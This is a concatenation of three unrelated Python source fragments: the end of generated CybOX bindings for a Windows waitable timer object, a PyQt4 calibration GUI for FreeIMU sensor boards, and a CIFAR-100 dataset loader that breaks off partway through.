'Digital_Signature': cybox_common.DigitalSignatureInfoType,
'Code_Snippets': cybox_common.CodeSnippetsType,
'Value': cybox_common.StringObjectPropertyType,
'Length': cybox_common.IntegerObjectPropertyType,
'Encoding': cybox_common.ControlledVocabularyStringType,
'Internationalization_Settings': cybox_common.InternationalizationSettingsType,
'Tool_Configuration': cybox_common.ToolConfigurationType,
'Security_Attributes': cybox_common.StringObjectPropertyType,
'Object_Address': cybox_common.UnsignedLongObjectPropertyType,
'English_Translation': cybox_common.StringObjectPropertyType,
'Functions': cybox_common.FunctionsType,
'String_Value': cybox_common.StringObjectPropertyType,
'Pointer_Count': cybox_common.UnsignedLongObjectPropertyType,
'Build_Utility_Platform_Specification': cybox_common.PlatformSpecificationType,
'Compiler_Informal_Description': cybox_common.CompilerInformalDescriptionType,
'System': cybox_common.ObjectPropertiesType,
'Platform': cybox_common.PlatformSpecificationType,
'Usage_Context_Assumptions': cybox_common.UsageContextAssumptionsType,
'Type': win_handle_object.HandleType,
'Compilers': cybox_common.CompilersType,
'Tool_Type': cybox_common.ControlledVocabularyStringType,
'String': cybox_common.ExtractedStringType,
'Tool': cybox_common.ToolInformationType,
'Build_Information': cybox_common.BuildInformationType,
'Tool_Hashes': cybox_common.HashListType,
'Compiler_Platform_Specification': cybox_common.PlatformSpecificationType,
'Error_Instances': cybox_common.ErrorInstancesType,
'Data_Segment': cybox_common.StringObjectPropertyType,
'Certificate_Subject': cybox_common.StringObjectPropertyType,
'Language': cybox_common.StringObjectPropertyType,
'Property': cybox_common.PropertyType,
'Strings': cybox_common.ExtractedStringsType,
'File_System_Offset': cybox_common.IntegerObjectPropertyType,
'Reference_Description': cybox_common.StructuredTextType,
'User_Account_Info': cybox_common.ObjectPropertiesType,
'Configuration_Settings': cybox_common.ConfigurationSettingsType,
'Simple_Hash_Value': cybox_common.SimpleHashValueType,
'Byte_String_Value': cybox_common.HexBinaryObjectPropertyType,
'Instance': cybox_common.ObjectPropertiesType,
'Import': cybox_common.StringObjectPropertyType,
'Access_Mask': cybox_common.UnsignedLongObjectPropertyType,
'Identifier': cybox_common.PlatformIdentifierType,
'Tool_Specific_Data': cybox_common.ToolSpecificDataType,
'Execution_Environment': cybox_common.ExecutionEnvironmentType,
'ID': cybox_common.UnsignedIntegerObjectPropertyType,
'Dependencies': cybox_common.DependenciesType,
'Offset': cybox_common.IntegerObjectPropertyType,
'Date': cybox_common.DateRangeType,
'Hashes': cybox_common.HashListType,
'Segments': cybox_common.HashSegmentsType,
'Segment_Count': cybox_common.IntegerObjectPropertyType,
'Usage_Context_Assumption': cybox_common.StructuredTextType,
'Block_Hash': cybox_common.FuzzyHashBlockType,
'Dependency': cybox_common.DependencyType,
'Error': cybox_common.ErrorType,
'Trigger_Point': cybox_common.HexBinaryObjectPropertyType,
'Environment_Variable': cybox_common.EnvironmentVariableType,
'Byte_Run': cybox_common.ByteRunType,
'Contributors': cybox_common.PersonnelType,
'Image_Offset': cybox_common.IntegerObjectPropertyType,
'Imports': cybox_common.ImportsType,
'Library': cybox_common.LibraryType,
'References': cybox_common.ToolReferencesType,
'Windows_Handle': win_handle_object.WindowsHandleObjectType,
'Internal_Strings': cybox_common.InternalStringsType,
'Custom_Properties': cybox_common.CustomPropertiesType,
'Configuration_Setting': cybox_common.ConfigurationSettingType,
'Libraries': cybox_common.LibrariesType,
'Function': cybox_common.StringObjectPropertyType,
'Handle': win_handle_object.WindowsHandleObjectType,
'Description': cybox_common.StructuredTextType,
'Code_Snippet': cybox_common.ObjectPropertiesType,
'Build_Configuration': cybox_common.BuildConfigurationType,
'Address': cybox_common.HexBinaryObjectPropertyType,
'Search_Within': cybox_common.IntegerObjectPropertyType,
'Segment': cybox_common.HashSegmentType,
'Compiler': cybox_common.CompilerType,
'Name': cybox_common.StringObjectPropertyType,
'Signature_Description': cybox_common.StringObjectPropertyType,
'Block_Size': cybox_common.IntegerObjectPropertyType,
'Search_Distance': cybox_common.IntegerObjectPropertyType,
'Fuzzy_Hash_Value': cybox_common.FuzzyHashValueType,
'Dependency_Description': cybox_common.StructuredTextType,
'Contributor': cybox_common.ContributorType,
'Tools': cybox_common.ToolsInformationType,
'Data_Size': cybox_common.DataSizeType,
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print(USAGE_TEXT)
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Waitable_Timer'
rootClass = WindowsWaitableTimerObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
# sys.stdout.write('<?xml version="1.0" ?>\n')
# rootObj.export(sys.stdout.write, 0, name_=rootTag,
# namespacedef_='',
# pretty_print=True)
return rootObj
def parseEtree(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Waitable_Timer'
rootClass = WindowsWaitableTimerObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
rootElement = rootObj.to_etree(None, name_=rootTag)
content = etree_.tostring(rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement
def parseString(inString):
from mixbox.vendor.six import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Waitable_Timer'
rootClass = WindowsWaitableTimerObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
# sys.stdout.write('<?xml version="1.0" ?>\n')
# rootObj.export(sys.stdout.write, 0, name_="Windows_Waitable_Timer",
# namespacedef_='')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"WindowsWaitableTimerObjectType",
"WaitableTimerType"
]
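# --- Usage sketch (illustrative; not part of the generated bindings) ---
# A minimal parse/re-export round trip that mirrors the commented-out export
# calls in parse() above; `xml_string` is assumed to hold a well-formed
# Windows_Waitable_Timer XML fragment.
def _example_roundtrip(xml_string):
    obj = parseString(xml_string)                    # build the object tree
    sys.stdout.write('<?xml version="1.0" ?>\n')
    obj.export(sys.stdout.write, 0, name_='Windows_Waitable_Timer')
    return obj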
|
|
"""
cal_gui.py - Calibration GUI for FreeIMU boards
Copyright (C) 2012 Fabio Varesano <fabio at varesano dot net>
Development of this code has been supported by the Department of Computer Science,
Universita' degli Studi di Torino, Italy within the Piemonte Project
http://www.piemonte.di.unito.it/
This program is free software: you can redistribute it and/or modify
it under the terms of the version 3 GNU General Public License as
published by the Free Software Foundation.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys, os
from PyQt4.QtGui import QApplication, QDialog, QMainWindow, QCursor, QFileDialog
from ui_freeimu_cal import Ui_FreeIMUCal
from PyQt4.QtCore import Qt,QObject, pyqtSlot, QThread, QSettings, SIGNAL
import numpy as np
import serial, time
from struct import unpack, pack
from binascii import unhexlify
from subprocess import call
import pyqtgraph.opengl as gl
import cal_lib, numpy
from ctypes import util
try:
from OpenGL.platform import win32
except AttributeError:
pass
acc_file_name = "acc.txt"
magn_file_name = "magn.txt"
calibration_h_file_name = "calibration.h"
#####
##
## For 16-bit processors use word = 2
## For 32-bit processors use word = 4
##
#####
word = 2
acc_range = 25000
magn_range = 1000
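# --- Decoding sketch (illustrative; not part of the original tool) ---
# Shows how the `word` setting above maps onto the struct formats used by
# SerialWorker.run() further down: 16-bit boards send 2-byte values decoded
# with 'h', 32-bit boards send 4-byte values decoded with 'hh' (keeping the
# first half), exactly as in the acquisition loop.
def _example_unpack_value(raw_bytes, word_size=word):
    if word_size == 4:
        return unpack('hh', raw_bytes)[0]
    return unpack('h', raw_bytes)[0]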
class FreeIMUCal(QMainWindow, Ui_FreeIMUCal):
def __init__(self):
QMainWindow.__init__(self)
# Set up the user interface from Designer.
self.setupUi(self)
# load user settings
self.settings = QSettings("FreeIMU Calibration Application", "Fabio Varesano")
# restore previous serial port used
self.serialPortEdit.setText(self.settings.value("calgui/serialPortEdit", "").toString())
# Set up BaudRate
self.setBaudRateComboBox.currentIndexChanged.connect(self.selectionchange)
self.serial_baudrate = str(self.setBaudRateComboBox.currentText()) # default baud rate until the user changes the selection
# when user hits enter, we generate the clicked signal to the button so that connections
self.connect(self.serialPortEdit, SIGNAL("returnPressed()"), self.connectButton, SIGNAL("clicked()"))
# Connect up the buttons to their functions
self.connectButton.clicked.connect(self.serial_connect)
self.samplingToggleButton.clicked.connect(self.sampling_start)
self.set_status("Disconnected")
# data storages
self.acc_data = [[], [], []]
self.magn_data = [[], [], []]
# setup graphs
self.accXY.setXRange(-acc_range, acc_range)
self.accXY.setYRange(-acc_range, acc_range)
self.accYZ.setXRange(-acc_range, acc_range)
self.accYZ.setYRange(-acc_range, acc_range)
self.accZX.setXRange(-acc_range, acc_range)
self.accZX.setYRange(-acc_range, acc_range)
self.accXY.setAspectLocked()
self.accYZ.setAspectLocked()
self.accZX.setAspectLocked()
self.magnXY.setXRange(-magn_range, magn_range)
self.magnXY.setYRange(-magn_range, magn_range)
self.magnYZ.setXRange(-magn_range, magn_range)
self.magnYZ.setYRange(-magn_range, magn_range)
self.magnZX.setXRange(-magn_range, magn_range)
self.magnZX.setYRange(-magn_range, magn_range)
self.magnXY.setAspectLocked()
self.magnYZ.setAspectLocked()
self.magnZX.setAspectLocked()
self.accXY_cal.setXRange(-1.5, 1.5)
self.accXY_cal.setYRange(-1.5, 1.5)
self.accYZ_cal.setXRange(-1.5, 1.5)
self.accYZ_cal.setYRange(-1.5, 1.5)
self.accZX_cal.setXRange(-1.5, 1.5)
self.accZX_cal.setYRange(-1.5, 1.5)
self.accXY_cal.setAspectLocked()
self.accYZ_cal.setAspectLocked()
self.accZX_cal.setAspectLocked()
self.magnXY_cal.setXRange(-1.5, 1.5)
self.magnXY_cal.setYRange(-1.5, 1.5)
self.magnYZ_cal.setXRange(-1.5, 1.5)
self.magnYZ_cal.setYRange(-1.5, 1.5)
self.magnZX_cal.setXRange(-1.5, 1.5)
self.magnZX_cal.setYRange(-1.5, 1.5)
self.magnXY_cal.setAspectLocked()
self.magnYZ_cal.setAspectLocked()
self.magnZX_cal.setAspectLocked()
self.acc3D.opts['distance'] = 30000
self.acc3D.show()
self.magn3D.opts['distance'] = 2000
self.magn3D.show()
ax = gl.GLAxisItem()
ax.setSize(x=20000, y=20000, z=20000)
self.acc3D.addItem(ax)
mx = gl.GLAxisItem()
mx.setSize(x=1000, y=1000, z=1000)
self.magn3D.addItem(mx)
self.acc3D_sp = gl.GLScatterPlotItem( color = (1, 1, 1, 1), size=2)
self.acc3D.addItem(self.acc3D_sp)
self.magn3D_sp = gl.GLScatterPlotItem( color = (1, 1, 1, 1), size=2)
self.magn3D.addItem(self.magn3D_sp)
# axis for the cal 3D graph
g_a = gl.GLAxisItem()
g_a.setSize(x=10000, y=10000, z=10000)
self.acc3D_cal.addItem(g_a)
g_m = gl.GLAxisItem()
g_m.setSize(x=1000, y=1000, z=1000)
self.magn3D_cal.addItem(g_m)
def selectionchange(self,i):
self.serial_baudrate = str(self.setBaudRateComboBox.currentText())
def set_status(self, status):
self.statusbar.showMessage(self.tr(status))
def serial_connect(self):
self.serial_port = str(self.serialPortEdit.text())
# save serial value to user settings
self.settings.setValue("calgui/serialPortEdit", self.serial_port)
self.settings.setValue("calgui/baudRateEdit", self.serial_baudrate)
self.connectButton.setEnabled(False)
# waiting mouse cursor
QApplication.setOverrideCursor(QCursor(Qt.WaitCursor))
self.set_status("Connecting to " + self.serial_port + " ...")
# TODO: serial port field input validation!
try:
self.ser = serial.Serial(
port= self.serial_port,
baudrate=self.serial_baudrate,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS
)
if self.ser.isOpen():
print "Arduino serial port opened correctly"
self.set_status("Connection Successfull. Waiting for Arduino reset...")
# wait for arduino reset on serial open
time.sleep(3)
self.ser.write('v') # ask version
self.set_status("Connected to: " + self.ser.readline()) # TODO: hangs if a wrong serial protocol has been loaded. To be fixed.
self.connectButton.setText("Disconnect")
self.connectButton.clicked.connect(self.serial_disconnect)
self.serialPortEdit.setEnabled(False)
self.serialProtocol.setEnabled(False)
self.samplingToggleButton.setEnabled(True)
self.clearCalibrationEEPROMButton.setEnabled(True)
self.clearCalibrationEEPROMButton.clicked.connect(self.clear_calibration_eeprom)
except serial.serialutil.SerialException, e:
self.connectButton.setEnabled(True)
self.set_status("Impossible to connect: " + str(e))
# restore mouse cursor
QApplication.restoreOverrideCursor()
self.connectButton.setEnabled(True)
def serial_disconnect(self):
print "Disconnecting from " + self.serial_port
self.ser.close()
self.set_status("Disconnected")
self.serialPortEdit.setEnabled(True)
self.serialProtocol.setEnabled(True)
self.connectButton.setText("Connect")
self.connectButton.clicked.disconnect(self.serial_disconnect)
self.connectButton.clicked.connect(self.serial_connect)
self.samplingToggleButton.setEnabled(False)
self.clearCalibrationEEPROMButton.setEnabled(False)
self.clearCalibrationEEPROMButton.clicked.disconnect(self.clear_calibration_eeprom)
def sampling_start(self):
self.serWorker = SerialWorker(ser = self.ser)
self.connect(self.serWorker, SIGNAL("new_data(PyQt_PyObject)"), self.newData)
self.serWorker.start()
print "Starting SerialWorker"
self.samplingToggleButton.setText("Stop Sampling")
self.samplingToggleButton.clicked.disconnect(self.sampling_start)
self.samplingToggleButton.clicked.connect(self.sampling_end)
def sampling_end(self):
self.serWorker.exiting = True
self.serWorker.quit()
self.serWorker.wait()
self.samplingToggleButton.setText("Start Sampling")
self.samplingToggleButton.clicked.disconnect(self.sampling_end)
self.samplingToggleButton.clicked.connect(self.sampling_start)
self.calibrateButton.setEnabled(True)
self.calAlgorithmComboBox.setEnabled(True)
self.calibrateButton.clicked.connect(self.calibrate)
def calibrate(self):
# read file and run calibration algorithm
(self.acc_offset, self.acc_scale) = cal_lib.calibrate_from_file(acc_file_name)
(self.magn_offset, self.magn_scale) = cal_lib.calibrate_from_file(magn_file_name)
# map floats into integers
self.acc_offset = map(int, self.acc_offset)
self.magn_offset = map(int, self.magn_offset)
# show calibrated tab
self.tabWidget.setCurrentIndex(1)
#populate acc calibration output on gui
self.calRes_acc_OSx.setText(str(self.acc_offset[0]))
self.calRes_acc_OSy.setText(str(self.acc_offset[1]))
self.calRes_acc_OSz.setText(str(self.acc_offset[2]))
self.calRes_acc_SCx.setText(str(self.acc_scale[0]))
self.calRes_acc_SCy.setText(str(self.acc_scale[1]))
self.calRes_acc_SCz.setText(str(self.acc_scale[2]))
#populate magn calibration output on gui
self.calRes_magn_OSx.setText(str(self.magn_offset[0]))
self.calRes_magn_OSy.setText(str(self.magn_offset[1]))
self.calRes_magn_OSz.setText(str(self.magn_offset[2]))
self.calRes_magn_SCx.setText(str(self.magn_scale[0]))
self.calRes_magn_SCy.setText(str(self.magn_scale[1]))
self.calRes_magn_SCz.setText(str(self.magn_scale[2]))
# compute calibrated data
self.acc_cal_data = cal_lib.compute_calibrate_data(self.acc_data, self.acc_offset, self.acc_scale)
self.magn_cal_data = cal_lib.compute_calibrate_data(self.magn_data, self.magn_offset, self.magn_scale)
# populate 2D graphs with calibrated data
self.accXY_cal.plot(x = self.acc_cal_data[0], y = self.acc_cal_data[1], clear = True, pen='r')
self.accYZ_cal.plot(x = self.acc_cal_data[1], y = self.acc_cal_data[2], clear = True, pen='g')
self.accZX_cal.plot(x = self.acc_cal_data[2], y = self.acc_cal_data[0], clear = True, pen='b')
self.magnXY_cal.plot(x = self.magn_cal_data[0], y = self.magn_cal_data[1], clear = True, pen='r')
self.magnYZ_cal.plot(x = self.magn_cal_data[1], y = self.magn_cal_data[2], clear = True, pen='g')
self.magnZX_cal.plot(x = self.magn_cal_data[2], y = self.magn_cal_data[0], clear = True, pen='b')
# populate 3D graphs with calibrated data
acc3D_cal_data = np.array(self.acc_cal_data).transpose()
magn3D_cal_data = np.array(self.magn_cal_data).transpose()
sp = gl.GLScatterPlotItem(pos=acc3D_cal_data, color = (1, 1, 1, 1), size=2)
self.acc3D_cal.addItem(sp)
sp = gl.GLScatterPlotItem(pos=magn3D_cal_data, color = (1, 1, 1, 1), size=2)
self.magn3D_cal.addItem(sp)
#enable calibration buttons to activate calibration storing functions
self.saveCalibrationHeaderButton.setEnabled(True)
self.saveCalibrationHeaderButton.clicked.connect(self.save_calibration_header)
self.saveCalibrationEEPROMButton.setEnabled(True)
self.saveCalibrationEEPROMButton.clicked.connect(self.save_calibration_eeprom)
def save_calibration_header(self):
text = """
/**
* FreeIMU calibration header. Automatically generated by FreeIMU_GUI.
* Do not edit manually unless you know what you are doing.
*/
#define CALIBRATION_H
const int acc_off_x = %d;
const int acc_off_y = %d;
const int acc_off_z = %d;
const float acc_scale_x = %f;
const float acc_scale_y = %f;
const float acc_scale_z = %f;
const int magn_off_x = %d;
const int magn_off_y = %d;
const int magn_off_z = %d;
const float magn_scale_x = %f;
const float magn_scale_y = %f;
const float magn_scale_z = %f;
"""
calibration_h_text = text % (self.acc_offset[0], self.acc_offset[1], self.acc_offset[2], self.acc_scale[0], self.acc_scale[1], self.acc_scale[2], self.magn_offset[0], self.magn_offset[1], self.magn_offset[2], self.magn_scale[0], self.magn_scale[1], self.magn_scale[2])
calibration_h_folder = QFileDialog.getExistingDirectory(self, "Select the folder in which to save the calibration.h file")
calibration_h_file = open(os.path.join(str(calibration_h_folder), calibration_h_file_name), "w")
calibration_h_file.write(calibration_h_text)
calibration_h_file.close()
self.set_status("Calibration saved to: " + str(calibration_h_folder) + calibration_h_file_name + " .\nRecompile and upload the program using the FreeIMU library to your microcontroller.")
def save_calibration_eeprom(self):
self.ser.write("c")
# pack data into a string
offsets = pack('<hhhhhh', self.acc_offset[0], self.acc_offset[1], self.acc_offset[2], self.magn_offset[0], self.magn_offset[1], self.magn_offset[2])
scales = pack('<ffffff', self.acc_scale[0], self.acc_scale[1], self.acc_scale[2], self.magn_scale[0], self.magn_scale[1], self.magn_scale[2])
# transmit to microcontroller
self.ser.write(offsets)
self.ser.write(scales)
self.set_status("Calibration saved to microcontroller EEPROM.")
# debug written values to console
print "Calibration values read back from EEPROM:"
self.ser.write("C")
for i in range(4):
print self.ser.readline()
def clear_calibration_eeprom(self):
self.ser.write("x")
# no feedback expected. we assume success.
self.set_status("Calibration cleared from microcontroller EEPROM.")
def newData(self, reading):
# only display last reading in burst
self.acc_data[0].append(reading[0])
self.acc_data[1].append(reading[1])
self.acc_data[2].append(reading[2])
self.magn_data[0].append(reading[6])
self.magn_data[1].append(reading[7])
self.magn_data[2].append(reading[8])
self.accXY.plot(x = self.acc_data[0], y = self.acc_data[1], clear = True, pen='r')
self.accYZ.plot(x = self.acc_data[1], y = self.acc_data[2], clear = True, pen='g')
self.accZX.plot(x = self.acc_data[2], y = self.acc_data[0], clear = True, pen='b')
self.magnXY.plot(x = self.magn_data[0], y = self.magn_data[1], clear = True, pen='r')
self.magnYZ.plot(x = self.magn_data[1], y = self.magn_data[2], clear = True, pen='g')
self.magnZX.plot(x = self.magn_data[2], y = self.magn_data[0], clear = True, pen='b')
acc_pos = numpy.array([self.acc_data[0],self.acc_data[1],self.acc_data[2]]).transpose()
self.acc3D_sp.setData(pos=acc_pos, color = (1, 1, 1, 1), size=2)
magn_pos = numpy.array([self.magn_data[0],self.magn_data[1],self.magn_data[2]]).transpose()
self.magn3D_sp.setData(pos=magn_pos, color = (1, 1, 1, 1), size=2)
class SerialWorker(QThread):
def __init__(self, parent = None, ser = None):
QThread.__init__(self, parent)
self.exiting = False
self.ser = ser
def run(self):
print "sampling start.."
self.acc_file = open(acc_file_name, 'w')
self.magn_file = open(magn_file_name, 'w')
count = 100
in_values = 9
self.ser.write("w")
word1 = self.ser.read()
word = chr(ord(word1))
self.ser.read(2)
reading = [0.0 for i in range(in_values)]
# read data for calibration
while not self.exiting:
# request a burst of 'count' raw readings from the board
self.ser.write('b')
self.ser.write(chr(count))
for j in range(count):
for i in range(in_values):
if word == '4':
reading[i] = unpack('hh', self.ser.read(4))[0]
if word == '2':
reading[i] = unpack('h', self.ser.read(2))[0]
self.ser.read(2) # consumes remaining '\r\n'
# prepare readings to store on file
acc_readings_line = "%d %d %d\r\n" % (reading[0], reading[1], reading[2])
self.acc_file.write(acc_readings_line)
#print(acc_readings_line)
magn_readings_line = "%d %d %d\r\n" % (reading[6], reading[7], reading[8])
self.magn_file.write(magn_readings_line)
# every count times we pass some data to the GUI
self.emit(SIGNAL("new_data(PyQt_PyObject)"), reading)
print ".",
# closing acc and magn files
self.acc_file.close()
self.magn_file.close()
return
def __del__(self):
self.exiting = True
self.wait()
print "SerialWorker exits.."
app = QApplication(sys.argv)
window = FreeIMUCal()
window.show()
sys.exit(app.exec_())
|
|
from library.utils import file_utils
import os, shutil, time
import numpy as np
from library.preprocessing.data_transform import transform
from library.datasets.cifar.base import CIFARBase
import h5py
class CIFAR100(CIFARBase):
def __init__(self,
num_images=1.0,
one_hot_encode=False,
train_validate_split=None,
preprocess='',
augment=False,
num_test_images=1.0,
endian='little',
save_h5py='',
make_image=True,
image_mode='rgb',
verbose=False):
"""
:param num_images:
:param one_hot_encode:
:param train_validate_split:
:param preprocess:
:param augment:
:param num_test_images:
:param endian:
:param save_h5py:
:param make_image:
:param image_mode:
:param verbose:
"""
super().__init__(num_images=num_images,
one_hot_encode=one_hot_encode,
train_validate_split=train_validate_split,
preprocess=preprocess,
augment=augment,
num_test_images=num_test_images,
endian=endian,
make_image=make_image,
image_mode=image_mode,
save_h5py=save_h5py,
verbose=verbose)
self.num_fine_classes = 100
self.num_coarse_classes = 20
self.file_url = 'https://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz'
self.file_md5 = 'eb9058c3a382ffc7106e4002c42a8d85'
self.coarse_classes = \
['aquatic mammals', 'fish', 'flowers', 'food containers', 'fruit and vegetables',
'household electrical devices', 'household furniture', 'insects', 'large carnivores',
'large man-made outdoor things', 'large natural outdoor scenes', 'large omnivores and herbivores',
'medium-sized mammals', 'non-insect invertebrates', 'people', 'reptiles', 'small mammals',
'trees', 'vehicles 1', 'vehicles 2']
self.fine_classes = \
['beaver', 'dolphin', 'otter', 'seal', 'whale',
'aquarium fish', 'flatfish', 'ray', 'shark', 'trout',
'orchids', 'poppies', 'roses', 'sunflowers', 'tulips',
'bottles', 'bowls', 'cans', 'cups', 'plates',
'apples', 'mushrooms', 'oranges', 'pears', 'sweet peppers',
'clock', 'computer keyboard', 'lamp', 'telephone', 'television',
'bed', 'chair', 'couch', 'table', 'wardrobe',
'bee', 'beetle', 'butterfly', 'caterpillar', 'cockroach',
'bear', 'leopard', 'lion', 'tiger', 'wolf',
'bridge', 'castle', 'house', 'road', 'skyscraper',
'cloud', 'forest', 'mountain', 'plain', 'sea',
'camel', 'cattle', 'chimpanzee', 'elephant', 'kangaroo',
'fox', 'porcupine', 'possum', 'raccoon', 'skunk',
'crab', 'lobster', 'snail', 'spider', 'worm',
'baby', 'boy', 'girl', 'man', 'woman',
'crocodile', 'dinosaur', 'lizard', 'snake', 'turtle',
'hamster', 'mouse', 'rabbit', 'shrew', 'squirrel',
'maple', 'oak', 'palm', 'pine', 'willow',
'bicycle', 'bus', 'motorcycle', 'pickup truck', 'train',
'lawn-mower', 'rocket', 'streetcar', 'tank', 'tractor']
def download_and_extract_data(self, data_directory):
"""
:param data_directory:
:return:
"""
print('Downloading and extracting CIFAR 100 file')
## Step 1: Make the directories './datasets/cifar100/' if they do not exist
if not os.path.exists(data_directory):
if self.verbose is True:
print('Creating the directory \'%s\'' % data_directory)
file_utils.mkdir_p(data_directory)
else:
if self.verbose is True:
print('Directory \'%s\' already exists' % data_directory)
## Step 2: Check if the CIFAR-100 archive already exists in the data directory
tar_file = data_directory + 'cifar-100.tar.gz'
make_tar = False
if not os.path.exists(tar_file):
make_tar = True
elif os.path.exists(tar_file) and not file_utils.verify_md5(tar_file, self.file_md5):
if self.verbose is True:
print('Removing the wrong file \'%s\'' % tar_file)
os.remove(tar_file)
make_tar = True
else:
if self.verbose is True:
print('CIFAR 100 tarfile exists and MD5 sum is verified')
## Step 3: Download CIFAR 100 dataset from 'http://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz'
if make_tar is True:
result = file_utils.download(self.file_url, tar_file, verbose=self.verbose)
if result is False:
if self.verbose is True:
raise FileNotFoundError('Download of CIFAR 100 dataset failed')
return False
result = file_utils.verify_md5(tar_file, self.file_md5, verbose=self.verbose)
if result is False:
if self.verbose is True:
raise FileNotFoundError('Downloaded CIFAR 100 dataset failed md5sum check')
return False
## Step 4: Extract the dataset
make_extract = False
batches_directory = data_directory + 'cifar-100-batches'
if not os.path.exists(batches_directory):
make_extract = True
else:
num_files = sum(os.path.isfile(os.path.join(batches_directory, f))
for f in os.listdir(batches_directory))
if num_files != 8:
shutil.rmtree(batches_directory)
make_extract = True
else:
if self.verbose is True:
print('Directory %s already exists' %batches_directory)
if make_extract is True:
print('Extracting file %s to %s' %(tar_file,batches_directory))
result = file_utils.extract(tar_file)
shutil.move('./cifar-100-python', batches_directory)
if result is False:
if self.verbose is True:
print('Extraction of CIFAR 100 dataset failed')
return False
else:
if self.verbose is True:
print('Extraction of CIFAR 100 dataset success')
return True
def dict_read(self, dict_file):
"""
:param dict_file:
:return:
"""
print(dict_file.keys())
fine_labels = dict_file[b'fine_labels']
coarse_labels = dict_file[b'coarse_labels']
data = dict_file[b'data']
batch_label = dict_file[b'batch_label']
filenames = dict_file[b'filenames']
if self.verbose is True:
print(dict_file.keys())
print(fine_labels[:5])
print(coarse_labels[:5])
print(batch_label[:5])
print(filenames[:5])
print(data[0].shape)
return data, fine_labels, coarse_labels, batch_label, filenames
def load_train_data(self, data_directory='/tmp/cifar100/'):
"""
:param data_directory:
:return:
"""
print('Loading CIFAR 100 Train Dataset')
basic_dir_path = data_directory + 'cifar-100-batches/'
data_batch_path = 'train'
data_files = [basic_dir_path + data_batch_path]
data_dict = [file_utils.unpickle(data_files[0])]
print('Reading unpickled data file: %s' % data_files[0])
data, fine_labels, coarse_labels, _, _ = self.dict_read(data_dict[0])
print(np.max(fine_labels))
print(np.max(coarse_labels))
data_fine_labels = fine_labels
data_coarse_labels = coarse_labels
data_images = np.array(data)
data_fine_labels = np.array(data_fine_labels)
data_coarse_labels = np.array(data_coarse_labels)
print('Success')
preprocessed_images = transform(data_images, transform_method=self.preprocess)
if self.make_image is True:
images = []
for fig_num in range(preprocessed_images.shape[0]):
fig = preprocessed_images[fig_num, :]
img = self.convert_images(fig, type=self.image_mode)
images.append(img)
images = np.array(images)
if self.train_validate_split is None:
self.train.data = np.array(preprocessed_images[:self.num_images, :])
if self.make_image is True:
self.train.images = np.array(images[:self.num_images, :])
self.train.fine_labels = np.array(data_fine_labels[:self.num_images])
self.train.coarse_labels = np.array(data_coarse_labels[:self.num_images])
self.train.fine_class_names = np.array(list(map(lambda x: self.fine_classes[x], self.train.fine_labels)))
print(self.fine_classes[:15])
print(self.train.fine_labels[:15])
print(self.train.fine_class_names[:15])
self.train.coarse_class_names = np.array(list(map(lambda x: self.coarse_classes[x], self.train.coarse_labels)))
else:
print('Requested to use only %d images' %self.num_images)
self.train.data = np.array(preprocessed_images[:self.num_train_images, :])
if self.make_image is True:
self.train.images = np.array(images[:self.num_train_images, :])
self.train.fine_labels = np.array(data_fine_labels[:self.num_train_images])
self.train.coarse_labels = np.array(data_coarse_labels[:self.num_train_images])
self.train.fine_class_names = np.array(list(map(lambda x: self.fine_classes[x], self.train.fine_labels)))
self.train.coarse_class_names = np.array(list(map(lambda x: self.coarse_classes[x], self.train.coarse_labels)))
self.validate.data = \
np.array(preprocessed_images[self.num_train_images:self.num_train_images+self.num_validate_images, :])
if self.make_image is True:
self.validate.images = np.array(images[self.num_train_images:self.num_train_images+self.num_validate_images, :])
self.validate.fine_labels = \
np.array(data_fine_labels[self.num_train_images:self.num_train_images+self.num_validate_images])
self.validate.coarse_labels = \
np.array(data_coarse_labels[self.num_train_images:self.num_train_images + self.num_validate_images])
self.validate.fine_class_names = np.array(list(map(lambda x: self.fine_classes[x],
self.validate.fine_labels)))
self.validate.coarse_class_names = np.array(list(map(lambda x: self.coarse_classes[x],
self.validate.coarse_labels)))
if self.one_hot_encode is True:
self.convert_one_hot_encoding(self.train.fine_labels, data_type='train', class_type='fine')
self.convert_one_hot_encoding(self.train.coarse_labels, data_type='train', class_type='coarse')
if self.train_validate_split is not None:
self.convert_one_hot_encoding(self.validate.fine_labels, data_type='validate', class_type='fine')
self.convert_one_hot_encoding(self.validate.coarse_labels, data_type='validate', class_type='coarse')
if self.save_h5py != '':
h5f = h5py.File(self.save_h5py, 'a')
h5f.create_dataset('train_dataset', data=self.train.data, compression="gzip", compression_opts=9)
print('Written CIFAR 100 train dataset to file: %s' % self.save_h5py)
h5f.close()
del data_coarse_labels
del data_fine_labels
del data_images
del preprocessed_images
if self.make_image is True:
del images
print()
return True
def load_test_data(self, data_directory='/tmp/cifar100/'):
"""
:param data_directory:
:return:
"""
print('Loading CIFAR 100 Test Dataset')
